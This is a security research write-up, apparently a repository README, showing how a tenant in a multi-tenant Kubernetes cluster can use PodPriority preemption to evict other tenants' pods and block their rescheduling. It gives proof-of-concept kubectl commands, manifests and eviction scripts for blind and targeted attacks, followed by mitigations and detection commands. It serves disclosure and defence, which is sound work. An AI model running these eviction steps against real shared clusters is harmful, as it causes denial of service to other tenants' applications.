- The issue concerns multi-tenant Kubernetes clusters
- The default Kubernetes configuration is affected
- A malicious tenant can create a pod that could preempt any pod on the cluster

The aim is to demonstrate how we could perform a Denial-of-Service of another pod in the same Kubernetes cluster using PodPriority.

By DoS we mean: pod eviction (if the target pod is already running) and blocking pod rescheduling.
Impact | Complexity |
---|---|
DoS of other tenant application | Easy/Intermediate |
- Theory
- PoC
- Limits
- Protection & Mitigation
- Cheat Sheet
- Additional Resources
Let's go back to school...

When several users or teams share a cluster with a fixed number of nodes, there is a concern that one team could use more than its fair share of resources ~> Resource Quotas: they limit aggregate resource consumption per namespace, both the quantity of objects and the compute resources that may be consumed.
Property |
---|
Resource Quotas do not apply to already created resources |
Object Count Quota: restrict the number of any namespaced resource. Example: restrict the pod count to 2:

```yaml
apiVersion: v1
kind: ResourceQuota
metadata:
  name: pods-quota
  namespace: toto
spec:
  hard:
    pods: 2
```
Property |
---|
If quota is enabled in a namespace for compute resources like cpu and memory, users must specify requests or limits for those values |
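As an illustration, a compute-resource quota could look like this (the name and values are made up for the example):

```yaml
apiVersion: v1
kind: ResourceQuota
metadata:
  name: compute-quota        # illustrative name
  namespace: toto
spec:
  hard:
    requests.cpu: "2"        # cap on the sum of all CPU requests in the namespace
    requests.memory: 2Gi
    limits.cpu: "4"          # cap on the sum of all CPU limits
    limits.memory: 4Gi
```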
Request vs Limit: a request is the amount of a resource guaranteed by Kubernetes for the container. Conversely, a limit for a resource is the maximum amount of that resource that Kubernetes will allow the container to use.
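For illustration, requests and limits are set per container (values are arbitrary):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: demo
spec:
  containers:
  - name: app
    image: nginx
    resources:
      requests:
        cpu: 500m        # guaranteed, used by the scheduler for placement
        memory: 128Mi
      limits:
        cpu: "1"         # hard cap enforced at runtime
        memory: 256Mi
```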
- 1 namespace per team
- The admin creates 1 ResourceQuota for each namespace
- Users create resources (pods, services, etc.) in the namespace, and the quota system tracks usage to ensure it does not exceed the hard resource limits defined in the ResourceQuota.
Pod priority: if a Pod cannot be scheduled, the scheduler tries to preempt (evict) lower-priority Pods to make scheduling of the pending Pod possible.
When a pod with priority is pending, the scheduler searches for a node with lower-priority pods; if the eviction of such a pod makes the scheduling of the higher-priority pod possible ⇒ the lower-priority pod is evicted + the higher-priority pod is scheduled.
- Add one or more PriorityClasses.
- Create Pods with `priorityClassName`.

That's all! Note that all previously created pods are set to the default priority (which is `0`).
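A minimal sketch of those two steps (names and the priority value are illustrative):

```yaml
apiVersion: scheduling.k8s.io/v1
kind: PriorityClass
metadata:
  name: high-priority
value: 1000000             # higher value = higher priority
globalDefault: false
description: "Example high-priority class"
---
apiVersion: v1
kind: Pod
metadata:
  name: important
spec:
  priorityClassName: high-priority   # opt the pod into the class above
  containers:
  - name: app
    image: nginx
```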
Property |
---|
It supports eviction decisions based on incompressible resources. Eviction doesn't happen if pressure is on compressible resources, e.g., CPU. |
Notes: this property only applies to kubelet eviction. CPU can actually be used to put the cluster in an Out-Of-Resource state and thus trigger the eviction process when a higher-priority pod is created.
Property |
---|
In the case of memory pressure, pods are sorted first based on whether their memory usage exceeds their request, then by pod priority, and then by consumption of memory relative to memory requests |
(Q) Could we evict an already running pod by creating a pod with higher priority?
Yes! See the PoC below.
(Q) Could we block pod scheduling by running a higher-priority pod?
Yes! With the same mechanism: if a running higher-priority pod exhausts the supply of a specific resource, all lower-priority pods won't be scheduled until the resource supply is sufficient again.
(Q) Is this attack feasible across namespaces?
Yes! A higher-priority pod can evict pods of another namespace.
(Q) To trigger an Out-of-Resource state, do we need to exhaust the resource supply of the whole cluster?
No, we only need to exhaust the supply of a specific node. BUT if the cluster resource supply isn't exhausted and you don't specify the node you want to exhaust, the malicious Pod will be scheduled on a node with adequate supply without evicting any pod.
This implies that an attacker can voluntarily restrict the zone where the higher-priority malicious pods are deployed to a single node to trigger the preemption process. Indeed, it is easier to stuff a single node than a whole cluster.
However, preempted pods will be rescheduled on other nodes if they have the right to.
(Q) Can we change the `priorityClass` of pods without having the right to directly modify them?
No! You can't change the `priorityClass` of running pods, BUT you can change the priorityClass of future pods (with the `globalDefault` field, priorityClass manipulation, etc.). In general, it is recommended not to grant users any rights on `priorityClass` objects unless they are admins, so that the priorityClass of pods cannot be changed.
Here we are!
We will put our cluster in an Out-Of-Resource state using CPU oversupply.
Use your cluster or create one with 3 nodes and a CPU limit of `4`:

`minikube start --cpus 4 --nodes 4`

In fact, `--cpus 4` seems to be useless. It is the value of `capacity.cpu`, found with `kubectl get nodes -o=jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.status.capacity.cpu}{"\n"}{end}'`, that matters (here `4`).
- Create low-priority pods (i.e., pods without a priorityClass ⇒ priority `0`), with a DaemonSet to be sure to have one on each node: `kubectl apply -f simple/ds-no-pod-priority.yml`

At this point, you must have 3 pods running, 1 on each node. Each node uses ~3 CPU.
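The content of `simple/ds-no-pod-priority.yml` is not reproduced here; a plausible sketch of such a DaemonSet (no `priorityClassName`, with a large CPU request so each node gets mostly filled) could be:

```yaml
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: low-prio
spec:
  selector:
    matchLabels:
      app: low-prio
  template:
    metadata:
      labels:
        app: low-prio
    spec:
      # no priorityClassName => default priority 0
      containers:
      - name: sleeper
        image: busybox
        command: ["sleep", "infinity"]
        resources:
          requests:
            cpu: "3"   # illustrative: occupies most of a 4-CPU node
```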
- Create a pod with high priority: `kubectl apply -f simple/pod-high.yml`. The key is that it must have `cpu` requests such that:
  - the total CPU requested by all pods is greater than the total amount of CPU available on each node ⇒ exhausts the CPU supply
  - the CPU request is not greater than the maximum node CPU ⇒ makes the pod's scheduling possible (once a lower-priority pod is evicted)

See that this evicts a low-priority pod (`Pending` status) and starts the high-priority pod.
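The repository's `simple/pod-high.yml` is not shown here; a sketch matching the two constraints above (class name is an assumption) might look like:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: high-prio
spec:
  priorityClassName: high-priority   # assumed PriorityClass name
  containers:
  - name: sleeper
    image: busybox
    command: ["sleep", "infinity"]
    resources:
      requests:
        cpu: "2"   # fits on a node, but only after a low-priority pod is evicted
```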
In a multi-tenant cluster, you probably don't have access to:

- the cpu limit
- information about other pods running in other namespaces
- etc.

To determine which amount of CPU request will trigger an eviction, you have to fumble around to get an idea of the cluster state. Indeed, being able to run a high-priority pod does not tell us whether a pod in another namespace has been evicted or not.
So, the goal is to trigger an Out-of-Resource state with lower-priority pods to estimate the amount to request. This relies on the assumption that the cluster is relatively stable (not many pod creations/deletions happen in a minute).
- Create a cluster with 3 nodes and a CPU limit of 4, create the `bad-tenant` namespace & create the `high-priority` PriorityClass:

`minikube start --cpus 4 --nodes 3`
`kubectl create ns bad-tenant`
`kubectl apply -f priorityClass-high.yml`
- Populate the cluster with lower-priority pods (to simulate other tenants' activities): `kubectl apply -f ds/ds-no-pod-priority.yml`
- Watch pods in both namespaces:

`watch -n 0.1 -d kubectl get pods -o wide`
`watch -n 0.1 -d kubectl get pods -o wide -n bad-tenant`

As the tenant, we can only deploy pods in our namespace `bad-tenant`.
- Create a deployment of lower-priority pods: `kubectl apply -f blind/deployment-estimate-no-priority.yml`
- See that the deployment's pod was successfully created and is running. Now progressively increase the deployment's replica count: `kubectl -n bad-tenant scale deployment/estimate --replicas=2`, `kubectl -n bad-tenant scale deployment/estimate --replicas=3`, and so on...
- When we reach 7 replicas, we observe that the new pod is `Pending` ⇒ we have stuffed our cluster and it is likely out of CPU (check with `kubectl describe pod [pending_estimate_pod] -n bad-tenant`). Hence, if we create the same deployment with high priority, it will evict some pods in other namespaces.
- Delete your low-priority deployment: `kubectl delete -f blind/deployment-estimate-no-priority.yml`
- Create the high-priority deployment & scale it to 7 replicas: `kubectl apply -f blind/deployment-high.yml && kubectl -n bad-tenant scale deployment/high-priority-evictor --replicas=7`
See that you actually have evicted a pod in the `default` namespace!
To easily see on which node the eviction occurs, you can set the replicas to 6 and create a higher-priority pod: the eviction occurs on the same node as this pod.
`kubectl apply -f blind/deployment-high.yml && kubectl -n bad-tenant scale deployment/high-priority-evictor --replicas=6 && kubectl apply -f blind/pod-high.yml`
Basically you can't choose which pod you will evict, BUT you can evict all lower-priority pods, including your specific target.
To do this you need to stuff the node where your target pod is running. 2 approaches:

- You already know the node where the target pod is running
- You know one label of the target pod

> Assuming we know on which node the target pod is scheduled.
For the PoC we will create a DaemonSet in the `default` namespace of a 5-node cluster (our target pod is one of its pods). Then we create a malicious higher-priority pod in another namespace that will trigger the eviction of this specific pod.
- Create the cluster, populate the `default` namespace, create the priorityClass, and create the `bad-tenant` namespace:

`minikube start --cpus 4 --nodes 5`
`kubectl create ns bad-tenant`
`kubectl apply -f priorityClass-high.yml`
`kubectl apply -f ds/ds-no-pod-priority.yml`
- Watch pods in both namespaces:

`watch -n 0.1 -d kubectl get pods -o wide`
`watch -n 0.1 -d kubectl get pods -o wide -n bad-tenant`

Assume our target is on node `minikube-m02`. Our aim is now to stuff this specific node. To do so:
- Schedule a pod (`scout`) on this node with a specific label (force scheduling with `pod.spec.nodeName`): `kubectl apply -f target/scout.yml`
- Create the deployment to stuff the node; to do so, add a `podAffinity` toward the `scout` pod to your deployment's pod: `kubectl apply -f target/deployment-high-affinity.yml`
- Scale the deployment progressively till you evict a Pod in the `default` namespace: `kubectl -n bad-tenant scale deployment.apps/deployment-high-affinity --replicas=2`

You have evicted the target pod on `minikube-m02`!
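The `target/scout.yml` and `target/deployment-high-affinity.yml` manifests are not reproduced here; the mechanism can be sketched as follows (labels, names, and requests are assumptions for illustration):

```yaml
# scout: pinned to the target's node, carries a label to anchor the affinity
apiVersion: v1
kind: Pod
metadata:
  name: scout
  namespace: bad-tenant
  labels:
    role: scout
spec:
  nodeName: minikube-m02       # force placement, bypassing the scheduler
  containers:
  - name: sleeper
    image: busybox
    command: ["sleep", "infinity"]
---
# the stuffer pods are attracted to the scout's node via podAffinity
apiVersion: apps/v1
kind: Deployment
metadata:
  name: deployment-high-affinity
  namespace: bad-tenant
spec:
  replicas: 1
  selector:
    matchLabels:
      app: stuffer
  template:
    metadata:
      labels:
        app: stuffer
    spec:
      priorityClassName: high-priority
      affinity:
        podAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
          - labelSelector:
              matchLabels:
                role: scout
            topologyKey: kubernetes.io/hostname
      containers:
      - name: sleeper
        image: busybox
        command: ["sleep", "infinity"]
        resources:
          requests:
            cpu: "1"
```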
Notes:

- Why not use `nodeName` for the deployment instead of podAffinity? Because when you specify `nodeName`, the scheduling process is not the same and preemption does not occur (you get an `OutOfCpu` status for your higher-priority pods instead)
- In a more realistic scenario you wouldn't see where the eviction happens. For a more realistic approach, see the Blind PoC
> Assuming we know a label of the target pod.

For the PoC we will create pods in the `default` namespace of a 3-node cluster (including our target). Then we create a malicious higher-priority pod in another namespace that will trigger the eviction of this specific pod.
The set-up process is nearly the same as in the blind DoS section.
- Create the cluster, populate the `default` namespace, create the priorityClass, and create the `bad-tenant` namespace:

`minikube start --cpus 4 --nodes 3`
`kubectl create ns bad-tenant`
`kubectl apply -f priorityClass-high.yml`
`kubectl apply -f ds/ds-no-pod-priority.yml`

- Create the target pod (no priorityClass + a specific label): `kubectl apply -f target/target-pod.yml`
- Determine the number of higher-priority pods needed to stuff the nodes (see Blind DoS). Then create the deployment of higher-priority pods with the adequate `replicas` value: `kubectl apply -f target/deployment-high.yml && kubectl -n bad-tenant scale deployment/deployment-high-priority --replicas=5`
- Watch pods in both namespaces:

`watch -n 0.1 -d kubectl get pods -o wide`
`watch -n 0.1 -d kubectl get pods -o wide -n bad-tenant`

Now we have a cluster with stuffed nodes. We want to evict the `target` pod of another tenant in another namespace. We have succeeded in obtaining specific labels of the target pod. We are going to use them with `podAntiAffinity`: we will instruct Kubernetes to schedule our higher-priority pod on a node where the `target` pod is *not*.
As all the nodes are stuffed and can't schedule the higher-priority pod without reaching a CPU Out-Of-Resource state, the anti-affinity can't be respected. The `podAntiAffinity` will then force the scheduling of the higher-priority pod where the target pod is, triggering its eviction.
- Create the high-priority pod: `kubectl apply -f target/pod-high.yml` (see Limits for more details)
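`target/pod-high.yml` is not reproduced here; the anti-affinity trick could be sketched like this (the `app: target` label is an assumption; note the `preferred...` policy, as required by the Limits section):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: high-prio-antiaffinity
  namespace: bad-tenant
spec:
  priorityClassName: high-priority
  affinity:
    podAntiAffinity:
      # "preferred" (soft): the scheduler tries to avoid the target's node,
      # but since every other node is stuffed, it lands on the target's node
      preferredDuringSchedulingIgnoredDuringExecution:
      - weight: 100
        podAffinityTerm:
          labelSelector:
            matchLabels:
              app: target          # assumed label of the target pod
          topologyKey: kubernetes.io/hostname
  containers:
  - name: sleeper
    image: busybox
    command: ["sleep", "infinity"]
    resources:
      requests:
        cpu: "1"
```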
Before running the scripts:

`pip install kubernetes`

To find how many replicas you need to create to stuff the cluster, and thus get near a cluster Out-of-CPU state:

`python3 estimate-cpu-supply.py -n bad-tenant --cpu 1 --increment 1 --replicas 2 --timeout 10`

It will output the number of replicas needed for this purpose.
Now we want to perform an eviction: stuff the cluster + create the evictor/preemptor pod:

`python3 evict.py -n bad-tenant --cpu 1 --replicas 5`

And if you like one-liners, estimate how to stuff the cluster & evict right after:

`python3 evict.py --replicas $(python3 estimate-cpu-supply.py && sleep 10)`
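The actual scripts probe the live cluster by trial and error; the arithmetic they approximate can be sketched with a pure function (the free-CPU values in the example are made up for illustration):

```python
import math

def replicas_to_stuff(free_cpu_per_node, cpu_request):
    """Estimate the replica count at which the next pod stays Pending.

    free_cpu_per_node: unreserved CPU on each node (in cores)
    cpu_request: CPU request of each replica (in cores)
    Returns the number of replicas that exhausts every node, plus one
    extra replica that cannot be scheduled anywhere.
    """
    fits = sum(math.floor(free / cpu_request) for free in free_cpu_per_node)
    return fits + 1

# Example: 3 nodes with ~2 free CPUs each and 1-CPU replicas gives 7,
# matching the 7-replica observation from the blind PoC above.
print(replicas_to_stuff([2, 2, 2], 1))  # -> 7
```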
- If you reach the `ResourceQuota`, you cannot create the malicious pod (it won't be placed in Pending mode, so it never enters the scheduling queue). So the attack is not doable.
- In the case of memory pressure, pods are sorted first based on whether their memory usage exceeds their request or not, then by pod priority, and then by consumption of memory relative to memory requests.
- `OutOfCpu` can occur for higher-priority pods (especially from a `deployment`) even if lower-priority pods are running. It happens because the named node on which your higher-priority pod requires scheduling does not have the resources to accommodate the pod => the pod fails. This is why you can't specify a `pod.spec.nodeName` in your malicious pod to evict pods of a specific node.
  - This does not apply to `pod.spec.nodeSelector`, `pod.spec.affinity.nodeAffinity`, `pod.spec.affinity.podAffinity` and `pod.spec.affinity.podAntiAffinity` (as they do not name a node). You can use them to perform lower-priority pod eviction on a targeted node.
  - Nevertheless, you can't use `pod.spec.affinity.podAffinity` with an affinity toward the pod you aim to evict => the high-priority pod will stay pending.
  - With `pod.spec.affinity.podAntiAffinity`, use `preferredDuringSchedulingIgnoredDuringExecution`.
- Put a `ResourceQuota` on each namespace to limit resource use. Check that the sum of all the limits & requests isn't higher than the overall cluster resources.
  - In addition, enforce the specification of pod resources
  - Raise an alert based on limits and requests (if no limit is supplied in the ResourceQuota, if a resource request is too big, etc.)
- Allow `ResourceQuota` and `priorityClass` use only for admin users (generally the same for all cluster-wide resources)
- Add rules via an admission controller to prevent specific uses of higher PriorityClasses (e.g. disallow `system-node-critical` for non-admin namespaces)
- Create a non-preempting PriorityClass (with `preemptionPolicy: Never`) to block preemption by higher-priority pods ~> higher-priority pods are placed in the scheduling queue ahead of lower-priority pods, but they cannot preempt other pods. This comes with a downside: pods with lower priority could be scheduled before them.
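Such a non-preempting PriorityClass could be sketched as (name and value are illustrative):

```yaml
apiVersion: scheduling.k8s.io/v1
kind: PriorityClass
metadata:
  name: high-priority-nonpreempting
value: 1000000
preemptionPolicy: Never   # queued ahead of lower priorities, but never evicts
globalDefault: false
```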
- Watch `FailedScheduling` or `Preempted` events to detect CPU starvation and evictions: `kubectl -n bad-tenant get events --sort-by='.metadata.creationTimestamp' -A --watch | grep -E "FailedScheduling|Preempted" --color`
- Get the cluster resources available: `kubectl top nodes` (needs the right to list the resource "nodes" in API group "metrics.k8s.io" at the cluster scope + metrics-server deployed)
  - Enable metrics-server with minikube: `minikube addons enable metrics-server`
  - Otherwise use `kubectl get nodes -o=jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.status.capacity.cpu}{"\n"}{end}'`
- Get pod priority classes: `kubectl get PriorityClass`
- `cpu` usage:
  - Stats on container CPU usage (%): `docker stats [container_name]`
  - Docker CPU limit: (inside the container) `cat /sys/fs/cgroup/cpu/cpu.cfs_quota_us` divided by `cat /sys/fs/cgroup/cpu/cpu.cfs_period_us` gives the number of CPUs allocated to the container
  - `kubectl describe nodes [node_name]`
- Watch pod changes in a namespace: `watch -d -n 0.1 -t kubectl get pods -o wide`
- Scale a deployment: `kubectl scale deployment/[name] --replicas=3`
- Resource Quota
- Pod priority preemption
- Kubernetes - Pods are preempted but the preemptor is not scheduled
- Preemption order
- Article on Pod Priority
- Article on Pod Priority & Pod eviction
- Try with resources other than cpu